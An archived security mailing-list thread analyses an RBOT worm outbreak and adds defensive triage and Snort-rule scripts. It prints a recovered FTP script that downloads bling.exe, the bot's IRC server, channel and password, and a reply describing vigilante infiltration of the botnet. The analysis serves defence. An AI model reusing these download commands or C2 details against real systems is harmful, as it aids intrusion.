[Intrusions] Winupdate2date.exe: New worm variant?

Benjamin Koch BK-D at gmx.de
Fri Oct 1 13:43:41 GMT 2004


Hello folks and friends ;)

Not long ago this thread was active.
I connected to this botnet server and joined the botnet channel.
I warned the admin of that botnet (shut down the server or you get
into trouble, and so on) and he was uncooperative...
So I made my threat come true.

4-5 days ago I posted all my collected facts to the ISP of this net.
As of now the server is offline ;)

Hope I could help you...

Greets Benjamin



Tuesday, September 21, 2004, 8:33:21 PM, you wrote:



AJ> Going over a Windows machine infected with RBOT:

AJ> ------------------------------------------------------------------
AJ> ------------------ First Machine ---------------------------------
AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     Microsoft Update Machine    REG_SZ  servicz.exe
AJ>     msupdates   REG_SZ  msupdt.exe
AJ> [root at gecko 040920-1]# cd ../040920-2
AJ> [root at gecko 040920-2]# more run.reg
AJ> ------------------------------------------------------------------




AJ> I came across a file that seemed to point to another campus machine as the
AJ> source of the infection:

AJ> ------------------------------------------------------------------
AJ> # cat o
AJ> open 130.85.ccc.ddd 19302
AJ> user 1 1
AJ> get bling.exe
AJ> quit


AJ> ------------------------------------------------------------------
AJ> ------------------ Second Machine --------------------------------


AJ> This second machine turned out to have an infection with different (extra?)
AJ> characteristics:

AJ> ------------------------------------------------------------------
AJ> # cat run.reg

AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     Cryptographic Service       REG_SZ 
AJ> C:\WINDOWS\System32\ioplmwb.exe
AJ>     msupdates   REG_SZ  msupdt.exe
AJ>     WindowsRegKey update2date   REG_SZ  winupdate2date.exe


AJ> ------------------------------------------------------------------
AJ> ------------------ Third Machine ---------------------------------


AJ> Then we turned up a third machine in the same building that also had
AJ> winupdate2date.exe (and did not have msupdt.exe):

AJ> ------------------------------------------------------------------
AJ> # cat run.reg

AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     McAfeeUpdaterUI     REG_SZ  "C:\Program Files\Network
AJ> Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
AJ>     ShStatEXE   REG_SZ  "C:\Program Files\Network
AJ> Associates\VirusScan\SHSTAT.EXE" /STANDALONE
AJ>     NDPS        REG_SZ  C:\WINDOWS\System32\dpmw32.exe
AJ>     NWTRAY      REG_SZ  NWTRAY.EXE
AJ>     WindowsRegKey update2date   REG_SZ  winupdate2date.exe

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents
AJ> ------------------------------------------------------------------


AJ> The file winupdate2date.exe has MD5 hash:

AJ> 	047379e3e9d02ced7e5dbf046a9b1f4c


AJ> I haven't been able to find a reference for it.  Has anyone else seen it
AJ> (and/or know anything about it)?

AJ> BTW, we found the third machine through a snort rule that detects RBOT
AJ> IRC traffic.  Its IRC channel was on server 66.111.42.128.

AJ> 09/21/04 14:19:28 dns 66.111.42.128
AJ> nslookup 66.111.42.128
AJ> Canonical name: unknown.sagonet.net
AJ> Addresses:
AJ>   66.111.42.128




AJ> The following text strings were at the beginning of the (slightly
AJ> sanitized) process memory dumps of winupdate2date.exe on the second
AJ> and third machines:

AJ> ------------------ PmDump from Second Machine ---------------------


AJ> # strings pmdump_3888_winupdate2date.exe.txt | more
AJ> [SCAN]: Random Scanner Avvia4
AJ> PONG :irc.NoNet.net
AJ> Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2052150 thre
AJ> [MAIN]: Joined channel: #!$!#.
AJ> PONG
AJ> :irc.NoNet.net
AJ> PING :irc.NoNet.net
AJ> PING
AJ> vwmdqlpk
AJ> 2052\
AJ> <DNS name of system deleted from this line - AFJ>
AJ>  NICK vwmdqlpk
AJ> USER oimxhfsl 0 0 :vwmdqlpk
AJ> oimxhfsl
AJ> server.maxshells.com
AJ> #!$!#
AJ> letmein
AJ> vwmdqlpk
AJ> WinSock 2.0
AJ> Running
AJ> winupdate2date
AJ>  &   !
AJ> .exe
AJ> winupdate2date.exe
AJ> C:\WINDOWS\System32
AJ> C:\WINDOWS\System32\winupdate2date.exe
AJ> CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

AJ> !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
AJ> tuvwxyz{|}~
AJ> w[IDENTD]: Server running on Port: 113.
AJ> IsProcessorFeature`
AJ> Actx
AJ> [IY-
AJ> SsHd,
AJ> [IY-H
AJ> SsHd,
AJ> C:\WINDOWS\System32\winupdate2date.exe 1792
AJ> "C:\WINDOWS\system32\winupdate2date.exe"

AJ> !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
AJ> -v1.3.14.3.2.22
AJ> er\Advanced
AJ> -v1.2.840.113549.1.1.1
AJ> 3v8?
AJ> 3v`?
AJ> CryptSIPDllPutSignedDataMsg
AJ> CryptSIPDllGetSignedDataMsg
AJ> CryptSIPDllRemoveSignedDataMsg
AJ> CryptSIPDllCreateIndirectData
AJ> CryptSIPDllVerifyIndirectData
AJ> CryptSIPDllIsMyFileType
AJ> CryptSIPDllIsMyFileType2
AJ> CryptDllExportPublicKeyInfoEx


AJ> ------------------- PmDump from Third Machine --------------------------

AJ> [root at gecko 040920-3]# strings
AJ> pmdump_1156_winupdate2date.exe.txt | more
AJ> [SCAN]: Random Scanner Avvia4
AJ> PONG :irc.NoNet.net
AJ> Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2046150 thre
AJ> [MAIN]: Joined channel: #!$!#.
AJ> PONG
AJ> :irc.NoNet.net
AJ> PING :irc.NoNet.net
AJ> PING
AJ> ongvjfr
AJ> 2046H
AJ> <DNS name of system deleted from this line - AFJ>
AJ>  NICK ongvjfr
AJ> USER webxah 0 0 :ongvjfr
AJ> webxah
AJ> server.maxshells.com
AJ> #!$!#
AJ> letmein
AJ> ongvjfr
AJ> WinSock 2.0
AJ> Running
AJ> winupdate2date
AJ>  &   !
AJ> .exe
AJ> winupdate2date.exe
AJ> C:\WINDOWS\System32
AJ> C:\WINDOWS\System32\winupdate2date.exe
AJ> CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AJ> 
AJ> !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
AJ> tuvwxyz{|}~
AJ> w[IDENTD]: Server running on Port: 113.
AJ> IsProcessorFeature
AJ> Actx
AJ> [IY-
AJ> SsHd,
AJ> [IY-H
AJ> SsHd,
AJ> C:\WINDOWS\System32\winupdate2date.exe 1792
AJ> "C:\WINDOWS\system32\winupdate2date.exe"
AJ> 
AJ> !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~


AJ> ------------------------------------------------------------------------------
AJ> ** Andy Johnston (andy at umbc.edu)          *                   **
AJ> **                                        * PGP key:(afj2002) 4096/8448B056 **
AJ> ** Office of Information Technology, UMBC *   4A B4 96 64 D9 B6 EF E3 21 9A **
AJ> ** 410-455-2583 (v)/410-455-1065 (f)      *   46 1A 37 11 F5 6C 84 48 B0 56 **
AJ> ------------------------------------------------------------------------------
AJ> _______________________________________________
AJ> Intrusions mailing list
AJ> Intrusions at lists.sans.org
AJ> http://www.dshield.org/mailman/listinfo/intrusions
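Andy worked out the cross-host pattern (msupdt.exe on the first two machines, winupdate2date.exe on the last two, bare executable names instead of full paths) by reading the three run.reg dumps by eye. The script below does the same triage over reg.exe 3.0 "query" output. It is an added example, not code from the thread or from any tool the thread names; the three dumps are transcribed from the listings above (with the wrapped McAfee lines rejoined), the watchlist contains only names the thread itself reports, and the "bare name" heuristic (a Run value that relies on PATH search rather than a full path) is an assumption of this script, not something the thread states.

```python
"""Triage of HKLM Run-key dumps (reg.exe 3.0 'query' format) from several
hosts: parse the value lines, flag entries worth a second look, and find
executables shared between hosts.

Added example, not code from the thread.  RUN_DUMPS is transcribed from the
three listings in the thread; WATCHLIST holds only names the thread reports.
"""
import re
from collections import defaultdict

RUN_DUMPS = {
    "machine1": r"""! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    Microsoft Update Machine    REG_SZ  servicz.exe
    msupdates   REG_SZ  msupdt.exe
""",
    "machine2": r"""! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    Cryptographic Service       REG_SZ  C:\WINDOWS\System32\ioplmwb.exe
    msupdates   REG_SZ  msupdt.exe
    WindowsRegKey update2date   REG_SZ  winupdate2date.exe
""",
    "machine3": r"""! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    McAfeeUpdaterUI     REG_SZ  "C:\Program Files\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
    ShStatEXE   REG_SZ  "C:\Program Files\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
    NDPS        REG_SZ  C:\WINDOWS\System32\dpmw32.exe
    NWTRAY      REG_SZ  NWTRAY.EXE
    WindowsRegKey update2date   REG_SZ  winupdate2date.exe

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents
""",
}

# Names reported in the thread (servicz.exe / msupdt.exe / ioplmwb.exe / winupdate2date.exe).
WATCHLIST = {"servicz.exe", "msupdt.exe", "winupdate2date.exe", "ioplmwb.exe"}

# A value line is: indent, name, two or more spaces, REG_* type, optional data.
VALUE_RE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_[A-Z_]+)(?:\s+(?P<data>.*))?$")


def parse_run_key(dump):
    """Return {value_name: data} for every value line in a reg.exe dump."""
    values = {}
    for line in dump.splitlines():
        m = VALUE_RE.match(line)  # banner, blank and HKEY_ lines do not match
        if m:
            values[m.group("name").strip()] = (m.group("data") or "").strip()
    return values


def program_path(data):
    """The program part of a Run value: the quoted path, or the first token."""
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    parts = data.split(maxsplit=1)
    return parts[0] if parts else ""


def executable_of(data):
    """Lower-cased basename of the program a Run value launches."""
    return program_path(data).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_entries(values):
    """Return [(name, data, reasons)] for entries that deserve a look."""
    flagged = []
    for name, data in values.items():
        path = program_path(data)
        reasons = []
        # Heuristic (assumption of this script): a bare file name is found via
        # PATH search, which legitimate installers rarely rely on.
        if path and "\\" not in path and ":" not in path:
            reasons.append("bare executable name, resolved by PATH search")
        if executable_of(data) in WATCHLIST:
            reasons.append("executable is on the watchlist")
        if reasons:
            flagged.append((name, data, reasons))
    return flagged


def shared_executables(dumps):
    """{executable: [hosts]} for executables present in more than one dump."""
    seen = defaultdict(list)
    for host, dump in dumps.items():
        for data in parse_run_key(dump).values():
            seen[executable_of(data)].append(host)
    return {exe: sorted(hosts) for exe, hosts in seen.items() if len(hosts) > 1}


if __name__ == "__main__":
    for host, dump in RUN_DUMPS.items():
        for name, data, reasons in flag_entries(parse_run_key(dump)):
            print(f"{host}: [{name}] = {data}  <- {'; '.join(reasons)}")
    print("shared:", shared_executables(RUN_DUMPS))
```

On the three dumps from the thread this reports every entry on the second machine, NWTRAY and the update2date value on the third, and the two executables that span hosts (msupdt.exe on machines 1 and 2, winupdate2date.exe on machines 2 and 3), which is exactly the overlap that led Andy to the third machine. NWTRAY.EXE shows how the bare-name heuristic produces a finding that then needs a human to close.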
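The two PmDump listings show what a defender can and cannot key a detection on: the nick and user strings differ between the second and third machine, while the channel, server names, identd port and scanner target stay the same. The script below, an added example that is not code from the thread, pulls those indicators out of `strings` output, splits them into host-stable and per-host values, and renders the stable channel join as a Snort hex content match. The excerpts are transcribed from the two listings above; the reading that the line after the bare channel name is the channel password is an assumption of this script, and the rule uses port `any` because the thread does not give the IRC server's port.

```python
"""Extract IRC bot indicators from `strings` output of process memory dumps,
separate host-stable values (detection material) from per-host noise, and
emit a Snort content match for the stable channel join.

Added example, not code from the thread.  The excerpts are transcribed from
the thread's PmDump listings; the password heuristic is this script's own.
"""
import re

DUMP_SECOND = r"""[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2052150 thre
[MAIN]: Joined channel: #!$!#.
vwmdqlpk
 NICK vwmdqlpk
USER oimxhfsl 0 0 :vwmdqlpk
server.maxshells.com
#!$!#
letmein
winupdate2date.exe
C:\WINDOWS\System32\winupdate2date.exe
w[IDENTD]: Server running on Port: 113.
"""

DUMP_THIRD = r"""[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2046150 thre
[MAIN]: Joined channel: #!$!#.
ongvjfr
 NICK ongvjfr
USER webxah 0 0 :ongvjfr
server.maxshells.com
#!$!#
letmein
winupdate2date.exe
C:\WINDOWS\System32\winupdate2date.exe
w[IDENTD]: Server running on Port: 113.
"""

HOST_RE = re.compile(r"^[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")
NOT_HOSTS = {"exe", "dll", "txt"}  # heuristic: file names also look like hostnames


def extract_indicators(dump):
    """Return a dict of IRC/scanner indicators found in one strings dump."""
    lines = [l.strip() for l in dump.splitlines()]
    ind = {"nick": None, "user": None, "channel": None, "password": None,
           "irc_servers": set(), "scan_target": None, "identd_port": None}
    for line in lines:
        if m := re.match(r"NICK\s+(\S+)$", line):
            ind["nick"] = m.group(1)
        elif m := re.match(r"USER\s+(\S+)\s+\S+\s+\S+\s+:(\S+)$", line):
            ind["user"] = m.group(1)
        elif m := re.search(r"Joined channel:\s*(#\S+?)\.?$", line):
            ind["channel"] = m.group(1)          # trailing '.' is log punctuation
        elif m := re.match(r"P[IO]NG\s+:(\S+)$", line):
            ind["irc_servers"].add(m.group(1))   # server name from keepalives
        elif m := re.search(r"Scanner Avviato\s*:\s*(\S+):(\d+)", line):
            ind["scan_target"] = (m.group(1), int(m.group(2)))
        elif m := re.search(r"\[IDENTD\]: Server running on Port:\s*(\d+)", line):
            ind["identd_port"] = int(m.group(1))
        elif HOST_RE.match(line) and line.rsplit(".", 1)[1].lower() not in NOT_HOSTS:
            ind["irc_servers"].add(line)         # bare hostname string
    # Assumption: the bot stores the channel name followed by its key/password.
    if ind["channel"] in lines:
        idx = lines.index(ind["channel"])
        if idx + 1 < len(lines):
            ind["password"] = lines[idx + 1]
    return ind


def split_stable(a, b):
    """Indicators equal across two hosts (detection material) vs. per-host ones."""
    stable = {k: a[k] for k in a if a[k] == b[k]}
    volatile = sorted(k for k in a if a[k] != b[k])
    return stable, volatile


def snort_hex_content(s):
    """Snort content match in |hex| form, avoiding escaping rules for # $ ; and quotes."""
    return 'content:"|' + " ".join(f"{b:02X}" for b in s.encode()) + '|";'


def snort_rule(channel, sid):
    """A Snort rule for the channel join; port is 'any' as the thread gives none."""
    return ('alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"IRC bot channel join"; '
            'flow:to_server,established; ' + snort_hex_content("JOIN " + channel) +
            f" sid:{sid}; rev:1;)")


if __name__ == "__main__":
    stable, volatile = split_stable(extract_indicators(DUMP_SECOND), extract_indicators(DUMP_THIRD))
    print("stable:", stable)
    print("volatile (do not alert on these):", volatile)
    print(snort_rule(stable["channel"], 1000001))
```

Run on the two excerpts, `nick` and `user` come out volatile and everything else stable, which is why a rule keyed on the channel join (or on the server names) survives reinfection while one keyed on a nick does not.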





